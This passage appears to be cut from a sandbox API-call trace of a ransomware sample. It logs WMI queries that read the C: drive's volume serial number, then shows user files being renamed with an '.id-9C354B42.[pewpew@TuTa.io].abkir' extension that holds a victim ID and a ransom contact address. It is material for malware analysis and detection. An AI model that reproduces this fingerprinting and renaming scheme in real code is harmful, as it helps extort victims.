| out: puResponse=0x949e904*=0xc19) returned 0x0 [0211.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a1b0, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0211.705] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.705] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0211.705] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0211.705] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0211.705] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.705] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x6027390) returned 0x0 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027390, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0211.706] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027390, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x602a220) returned 0x0 [0211.706] WbemDefPath:IUnknown:Release (This=0x6027390) returned 0x0 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x602a220) returned 0x0 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0211.706] WbemDefPath:IUnknown:AddRef (This=0x602a220) returned 0x3 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0x66ce3a8) returned 0x0 [0211.706] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce3a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.706] WbemDefPath:IUnknown:Release (This=0x66ce3a8) returned 0x3 [0211.706] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0211.706] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0211.706] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x2 [0211.706] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x1 [0211.706] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0211.706] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0211.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a220, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x602a220) returned 0x0 [0211.706] WbemDefPath:IUnknown:AddRef (This=0x602a220) returned 0x3 [0211.706] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x2 [0211.706] WbemDefPath:IWbemPath:SetText (This=0x602a220, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0211.707] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0211.707] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0211.707] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.707] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0211.707] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0211.707] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0211.707] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.707] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x6024ad0) returned 0x0 [0211.707] WbemLocator:IUnknown:QueryInterface (in: This=0x6024ad0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0211.707] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024ad0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027290) returned 0x0 [0211.707] WbemLocator:IUnknown:Release (This=0x6024ad0) returned 0x0 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027290) returned 0x0 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0211.708] WbemLocator:IUnknown:AddRef (This=0x6027290) returned 0x3 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0211.708] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0211.708] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0211.708] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x2 [0211.708] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x1 [0211.708] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0211.708] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0211.708] WbemLocator:IUnknown:QueryInterface (in: This=0x6027290, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027290) returned 0x0 [0211.708] WbemLocator:IUnknown:AddRef (This=0x6027290) returned 0x3 [0211.708] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x2 [0211.708] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0211.708] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0211.708] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.708] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x6027480) returned 0x0 [0211.708] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027480, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x6033794) returned 0x0 [0212.111] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5af54) returned 0x0 [0212.112] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5af54, pProxy=0x6033794, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0212.112] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x1 [0212.112] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5af74) returned 0x0 [0212.112] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5af54) returned 0x0 [0212.112] WbemLocator:IClientSecurity:SetBlanket (This=0xb5af54, pProxy=0x6033794, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0212.112] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x2 [0212.112] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0212.112] CoTaskMemFree (pv=0xbd4948) [0212.112] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x0 [0212.112] WbemLocator:IUnknown:QueryInterface (in: This=0x6033794, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5af74) returned 0x0 [0212.113] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0212.113] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0212.113] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0212.114] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0212.114] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0212.114] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5aed4) returned 0x0 [0212.114] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aed4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.114] WbemLocator:IUnknown:Release (This=0xb5aed4) returned 0x3 [0212.114] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0212.115] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0212.115] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5af5c) returned 0x0 [0212.115] WbemLocator:IRpcOptions:Query (in: This=0xb5af5c, pPrx=0xb5af74, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0212.115] WbemLocator:IUnknown:Release (This=0xb5af5c) returned 0x3 [0212.115] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0212.116] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0212.116] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0212.116] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x6033794) returned 0x0 [0212.116] WbemLocator:IUnknown:AddRef (This=0x6033794) returned 0x4 [0212.116] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x3 [0212.116] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x2 [0212.116] SysStringLen (param_1=0x0) returned 0x0 [0212.116] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0212.116] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0212.116] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.116] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0212.116] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0212.116] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5af74) returned 0x0 [0212.116] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x3 [0212.117] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0212.117] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0212.117] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.117] IWbemServices:GetObject (in: This=0x6033794, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0212.344] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a220, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0212.345] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0212.345] WbemDefPath:IWbemPath:GetText (in: This=0x602a220, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.345] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3721dc0*=0, plFlavor=0x3721dc4*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3721dc0*=8, plFlavor=0x3721dc4*=0) returned 0x0 [0212.345] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.345] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.345] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3721dc0*=8, plFlavor=0x3721dc4*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3721dc0*=8, plFlavor=0x3721dc4*=0) returned 0x0 [0212.345] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.345] SysStringByteLen (bstr="9C354B42") returned 0x10 [0212.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpFilePart=0x0) returned 0x97 [0212.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0212.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e908) returned 1 [0212.345] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x37d8d2c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0212.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0212.346] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 